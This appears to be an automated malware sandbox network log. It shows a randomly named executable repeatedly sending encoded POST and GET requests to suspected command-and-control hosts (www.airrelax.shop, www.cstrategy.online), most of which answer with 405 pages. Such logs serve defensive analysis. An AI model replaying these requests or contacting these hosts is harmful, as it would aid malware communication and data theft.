                                                                              Jan 11, 2025 09:30:03.306094885 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                              Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.850014172.67.215.235803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:08.449534893 CET634OUTPOST /an34/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.airrelax.shop
                                                                              Origin: http://www.airrelax.shop
                                                                              Referer: http://www.airrelax.shop/an34/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 50 50 37 39 49 45 70 43 76 43 46 45 6f 6c 6d 31 78 31 35 74 69 71 6d 53 73 74 7a 71 6a 56 69 37 4a 4d 71 37 39 4d 66 4a 4e 53 75 46 33 37 6d 51 39 47 56 53 61 36 38 36 46 66 66 36 41 6c 51 49 72 6e 42 47 78 6b 69 76 57 47 53 57 69 65 67 38 70 6a 64 6a 4b 30 36 31 50 2b 66 73 52 52 6b 6e 52 54 64 36 55 51 43 6c 56 4d 77 6c 55 69 2b 30 77 70 56 62 39 4a 4b 67 38 7a 44 6c 31 53 57 39 47 64 4c 6b 6e 6c 59 6d 67 49 62 35 6d 68 71 56 6d 63 51 54 36 64 45 64 65 68 4c 54 71 71 6f 42 37 75 70 6b 71 51 75 49 47 6e 7a 79 4d 37 6a 72 47 36 50 38 30 56 73 49 59 57 47 33 36 45 73 58 38 5a 56 78 79 57 49 3d
                                                                              Data Ascii: DzLTc=PP79IEpCvCFEolm1x15tiqmSstzqjVi7JMq79MfJNSuF37mQ9GVSa686Fff6AlQIrnBGxkivWGSWieg8pjdjK061P+fsRRknRTd6UQClVMwlUi+0wpVb9JKg8zDl1SW9GdLknlYmgIb5mhqVmcQT6dEdehLTqqoB7upkqQuIGnzyM7jrG6P80VsIYWG36EsX8ZVxyWI=
                                                                              Jan 11, 2025 09:30:09.185920954 CET1236INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Sat, 11 Jan 2025 08:30:09 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yG3s8eC3lB%2FgH97rZmBV%2FHOQLC4aR46zayMy2Slaa6qX7Q0mqx15u3y%2BkHeSS3wnT6rO9IF%2BZ3b%2FF28I3cHA8%2Fiwarw93VaCjzfBoDjTgdVNpuwXfpOOjdpbYkZgRqlq7xAFSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 90038b096be3423f-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1670&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=634&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                              Jan 11, 2025 09:30:09.185931921 CET124INData Raw: 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61
                                                                              Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.850015172.67.215.235803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:10.995969057 CET654OUTPOST /an34/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.airrelax.shop
                                                                              Origin: http://www.airrelax.shop
                                                                              Referer: http://www.airrelax.shop/an34/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 50 50 37 39 49 45 70 43 76 43 46 45 6f 42 61 31 32 6d 52 74 7a 4b 6d 52 31 64 7a 71 71 31 69 2f 4a 4c 69 37 39 49 48 6a 52 77 61 46 32 5a 4f 51 38 45 39 53 5a 36 38 36 52 76 66 37 50 46 51 44 72 6e 4e 4f 78 6b 75 76 57 47 75 57 69 61 6b 38 6f 53 64 6b 4c 6b 36 37 44 65 66 75 63 78 6b 6e 52 54 64 36 55 51 57 50 56 49 55 6c 55 53 75 30 78 4d 35 59 31 70 4b 76 73 6a 44 6c 6b 69 58 56 47 64 4c 57 6e 6b 30 4d 67 4c 76 35 6d 6a 43 56 6f 75 30 63 77 64 46 57 52 42 4b 43 36 5a 4a 56 7a 66 5a 45 68 53 4f 49 49 55 50 4f 4a 4e 53 42 63 59 48 36 33 56 45 6a 59 56 75 42 2f 7a 78 2f 6d 36 46 42 73 42 64 41 79 58 32 6c 33 70 44 46 5a 31 47 2b 52 54 30 6b 63 37 57 79
                                                                              Data Ascii: DzLTc=PP79IEpCvCFEoBa12mRtzKmR1dzqq1i/JLi79IHjRwaF2ZOQ8E9SZ686Rvf7PFQDrnNOxkuvWGuWiak8oSdkLk67DefucxknRTd6UQWPVIUlUSu0xM5Y1pKvsjDlkiXVGdLWnk0MgLv5mjCVou0cwdFWRBKC6ZJVzfZEhSOIIUPOJNSBcYH63VEjYVuB/zx/m6FBsBdAyX2l3pDFZ1G+RT0kc7Wy
                                                                              Jan 11, 2025 09:30:11.796701908 CET785INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Sat, 11 Jan 2025 08:30:11 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oqOETmJocwqpdKcAtUidjAc5TbzmqfJmyiBX86H%2FLQhNyLrvj1ZVbWlgqLrmmmePikGu0pYGrJ3lwo2Dp%2FFPT6QxTdr7OaMQkEc1zXhwpAf8hgi5cgMuZWiHl%2FE6KpIKU%2BMbhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 90038b192ac4c448-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1469&rtt_var=734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=654&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Jan 11, 2025 09:30:11.796720028 CET571INData Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
                                                                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.850016172.67.215.235803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:13.541340113 CET1671OUTPOST /an34/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.airrelax.shop
                                                                              Origin: http://www.airrelax.shop
                                                                              Referer: http://www.airrelax.shop/an34/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 50 50 37 39 49 45 70 43 76 43 46 45 6f 42 61 31 32 6d 52 74 7a 4b 6d 52 31 64 7a 71 71 31 69 2f 4a 4c 69 37 39 49 48 6a 52 77 43 46 33 71 32 51 39 69 31 53 59 36 38 36 53 76 66 2b 50 46 51 6b 72 6e 56 4b 78 6b 79 5a 57 41 69 57 69 2f 77 38 76 67 6c 6b 53 30 36 37 63 75 66 72 52 52 6b 49 52 54 4e 32 55 51 47 50 56 49 55 6c 55 55 69 30 6e 70 56 59 7a 70 4b 67 38 7a 44 68 31 53 58 75 47 64 44 38 6e 6b 78 35 67 39 66 35 6e 44 79 56 6c 39 51 63 79 39 46 55 57 42 4b 61 36 5a 46 6a 7a 63 39 6d 68 57 48 76 49 55 33 4f 49 37 48 6b 4e 6f 54 31 74 44 41 78 55 31 54 72 68 43 56 72 35 62 4a 48 71 32 4e 6c 36 78 53 4f 68 62 62 51 52 58 6e 68 4f 79 67 5a 55 4c 44 2f 77 2f 36 59 74 4a 55 4c 68 51 4a 35 31 72 58 31 34 5a 4d 31 69 48 61 6c 77 4f 77 41 76 73 55 34 6f 5a 68 4a 64 4f 68 52 38 70 39 6d 74 55 68 48 31 42 2f 53 41 65 36 6b 62 7a 36 65 53 45 52 4c 4a 35 71 2b 63 7a 44 59 79 52 31 7a 5a 2b 51 61 46 45 37 69 34 6c 68 66 64 79 61 68 43 2f 74 46 64 76 6e 66 2b 50 4a 48 67 2b 73 42 38 4d 4e 32 [TRUNCATED]
                                                                              Data Ascii: DzLTc=PP79IEpCvCFEoBa12mRtzKmR1dzqq1i/JLi79IHjRwCF3q2Q9i1SY686Svf+PFQkrnVKxkyZWAiWi/w8vglkS067cufrRRkIRTN2UQGPVIUlUUi0npVYzpKg8zDh1SXuGdD8nkx5g9f5nDyVl9Qcy9FUWBKa6ZFjzc9mhWHvIU3OI7HkNoT1tDAxU1TrhCVr5bJHq2Nl6xSOhbbQRXnhOygZULD/w/6YtJULhQJ51rX14ZM1iHalwOwAvsU4oZhJdOhR8p9mtUhH1B/SAe6kbz6eSERLJ5q+czDYyR1zZ+QaFE7i4lhfdyahC/tFdvnf+PJHg+sB8MN2hujOGthw5kErhXSsvqHl7ZsJA6GTYsm6OTZIq5gNirzOuwmGDIBajZwIdqKm6y79J7h7Vie5OgfMQVJGN0+Zl8J6wBD+u7GGz2P46Msue11qDL2g5MSNYOMIkV9Wa3mo6x5RV4mRczrpF5ALDG4NTpAbKY0R56yKQQRBMWbOujo/v0ukTAUaBWtQy24TEbKqSvwDPK0jthjsyMQ0PAGXLtiWU9Dz9oATy32BL7ywB1mydl7jMTPozUfz0hy8zNph6XdcrmSP2RoxIIAplAhCxdfC48mpiWmr6D8nQIG//pOCDpfCJagsUuAJvr8VJ4V7g+MePrW4SR2SCWpAofqfCjmNZ/ev3lHIepraAhfcoSw5JXrviU8zl7S9mLBB8he0RGFAMZrH4wzxl37vWKOJB5ybskCX5aq4CNxmdVNCV6PSyBpjgWFYbBJCg0f0ZdUQ7RdKhYtxaQctURYJbINi/qWhB6csLjzcccl6NiurUNVPtjptUNYahcJCxIZVQGEeTd78nW929rd0ALgHJGaCFcR6uq/DNFP81No63CIdXaXBuFr6LdG/hWqyqCNFpN9UlghZSf8pvr0+hEHxJWM1UNeH120q4UA2swk6LdpoabSIObmh1RxoJjKwULfV3mPdltw57qlCL1Rfmv6l3JM5fKEG8fWbSJHYGW [TRUNCATED]
                                                                              Jan 11, 2025 09:30:14.229127884 CET786INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Sat, 11 Jan 2025 08:30:14 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xYq3JO4YnPaDZ%2F2SkaxSg8AB7ss55QvdCwRPx%2Fm4wF96irDEWJcZ5%2B9aVEkvWVjhvIZtloMF9sXBdDI0OJ3BZaYgPtQvKA5DkczFgqWmDptS8TeA%2F5JTdhS0oeHepcF0Q9zhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 90038b290d05c33b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1684&rtt_var=842&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1671&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Jan 11, 2025 09:30:14.230282068 CET571INData Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
                                                                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.850017172.67.215.235803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:16.089102983 CET377OUTGET /an34/?m8=urJ0WtmP0FPTTB&DzLTc=CNTdLyZz4y5GtyaihT4QjOii4vbhvEXfI6qLlcD2dwDay6yy3VddH/MIEeXBPGgw7Dla3BC4dxGnjsgYjSxnMH2Hc8XocnANWTB8FhPTbLNabm+q6O9g6Njbhwnq8CC3Yg== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.airrelax.shop
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:30:16.780342102 CET1236INHTTP/1.1 200 OK
                                                                              Date: Sat, 11 Jan 2025 08:30:16 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              last-modified: Fri, 25 Oct 2024 07:07:10 GMT
                                                                              vary: Accept-Encoding
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-methods: GET, POST, OPTIONS
                                                                              access-control-allow-headers: User-Agent,Keep-Alive,Content-Type
                                                                              access-control-max-age: 1728000
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nStmyHc%2F9mdgwzshSsHIRksISRQr8KH1K19%2F9VLaGlXjzMXu7qlFbTuaI3Mh%2FAH1nTSZRQsYTKCAU314tyitty2hCNe5sB81HSPUCsZNwaK2HXZ0WpC2MTCfHqAhqosHgfCIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 90038b38fa01435b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 37 32 39 66 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f
                                                                              Data Ascii: 729f<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Co
                                                                              Jan 11, 2025 09:30:16.780355930 CET1236INData Raw: 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d
                                                                              Data Ascii: mpatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><title>gameshappy.top: Where happiness meets innovation | Online
                                                                              Jan 11, 2025 09:30:16.780361891 CET1236INData Raw: 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 61 70 70 22 3e 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 76 61 6e 2d 70 6f 70 75 70 20 76 61 6e
                                                                              Data Ascii: pt></head><body><div id="app"><div data-v-49759819="" class="van-popup van-popup--left"style="height: 100vh; min-width: 35%; color: rgb(8, 8, 8); overflow-y: auto; z-index: 2002; left: -20rem; transition: left 0.3s ease 0s;"><h
                                                                              Jan 11, 2025 09:30:16.780371904 CET1236INData Raw: 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 61 6c 74 3d
                                                                              Data Ascii: class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/puzzle.dd901ca5.png" data-src="img/puzzle.dd901ca5.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name"
                                                                              Jan 11, 2025 09:30:16.780379057 CET1236INData Raw: 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 4b 69 64 73 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 2f 64 69
                                                                              Data Ascii: <span data-v-49759819="" class="item_name">Kids</span></div></a><a data-v-49759819="" href="search.html?type=Strategy" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img
                                                                              Jan 11, 2025 09:30:16.780432940 CET1236INData Raw: 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 69 6d 67 2f 63 6c 61 73 73 69 63 73 2e 63 62 39 39 36 31 63 36 2e 70 6e 67 22 20 64 61 74 61 2d 73 72 63
                                                                              Data Ascii: 9=""><img data-v-49759819="" alt="" src="img/classics.cb9961c6.png" data-src="img/classics.cb9961c6.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Classics</span></div
                                                                              Jan 11, 2025 09:30:16.780440092 CET776INData Raw: 33 38 2e 33 37 33 31 33 39 2d 33 38 2e 33 37 33 31 33 39 20 33 38 2e 33 37 33 31 33 39 7a 4d 38 32 38 2e 37 30 36 33 30 36 20 32 38 39 2e 39 39 38 36 30 31 68 2d 36 33 33 2e 34 31 32 36 31 32 63 2d 32 31 2e 31 38 31 39 37 33 20 30 2d 33 38 2e 33
                                                                              Data Ascii: 38.373139-38.373139 38.373139zM828.706306 289.998601h-633.412612c-21.181973 0-38.373139-17.191166-38.373138-38.373139s17.191166-38.373139 38.373138-38.373139h633.412612c21.181973 0 38.373139 17.191166 38.373138 38.373139s-17.191166 38.373139-3
                                                                              Jan 11, 2025 09:30:16.780464888 CET1236INData Raw: 30 39 31 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 32 34 20 31 30 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 0a 09 09 09 09 09 09 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76
                                                                              Data Ascii: 0911" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="3078" data-spm-anchor-id="a313x.7781069.0.i2"xmlns:xlink="http://www.w3.org/1999/xlink" width="1.5rem" height="1.5rem" class="icon"><path
                                                                              Jan 11, 2025 09:30:16.780472040 CET1236INData Raw: 64 69 76 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 20 74 3d 22 31 36 38 30 30 37 39 39 39 32 37 35 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20
                                                                              Data Ascii: div data-v-0544793f=""><svg data-v-0544793f="" t="1680079992751" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="15827" width="2rem" height="2rem" class="icon"><path data-v-0544793f=""d
                                                                              Jan 11, 2025 09:30:16.780478954 CET1236INData Raw: 64 65 78 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 39 66 33 35 64 38 33 32 3d 22 22 20 64 61 74 61 2d 76 2d 35 37 37 36 63 37 65 63 3d 22 22 20 63 6c 61 73 73 3d 22 64 65 66 61 75 6c 74 5f 74 69 74 6c 65 22 3e 0a 09 09
                                                                              Data Ascii: dex"><div data-v-9f35d832="" data-v-5776c7ec="" class="default_title"><div data-v-9f35d832="" class="title"><span data-v-9f35d832="">New Games</span></span><img data-v-9f35d832="" alt="" src="img/popula
                                                                              Jan 11, 2025 09:30:16.785473108 CET1236INData Raw: 09 09 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c
                                                                              Data Ascii: </path></svg></a></div></div></div><div data-v-5924636a="" class="top_game"></div></div></div>...<div id='div-gpt-ad-1711337596648-0' style='min-width: 0p


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.850018194.76.119.60803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:22.299035072 CET643OUTPOST /zz3m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.cstrategy.online
                                                                              Origin: http://www.cstrategy.online
                                                                              Referer: http://www.cstrategy.online/zz3m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 6b 36 31 36 31 57 31 66 55 49 49 45 52 70 37 53 54 4e 6e 38 74 77 71 39 35 43 56 2b 41 46 56 41 45 7a 7a 39 31 47 54 4e 42 45 55 47 62 69 48 30 47 50 65 30 30 51 76 4a 47 77 75 58 70 67 53 31 53 6c 7a 53 77 48 69 33 41 52 43 56 78 64 4a 2b 6a 77 56 6d 53 45 56 35 50 4d 45 50 6a 35 43 6a 41 65 69 74 5a 73 50 74 6e 66 73 73 57 44 4f 61 53 2b 58 74 44 79 47 75 68 53 47 79 7a 68 6a 57 78 4e 45 43 68 74 76 70 2f 45 6f 4d 7a 74 58 7a 45 56 67 66 76 61 53 48 77 56 53 56 51 51 73 72 73 74 7a 62 63 78 75 31 62 62 44 54 36 74 56 55 47 56 49 30 66 50 2b 61 38 53 51 4a 62 6b 4a 42 54 70 42 66 58 4d 6f 3d
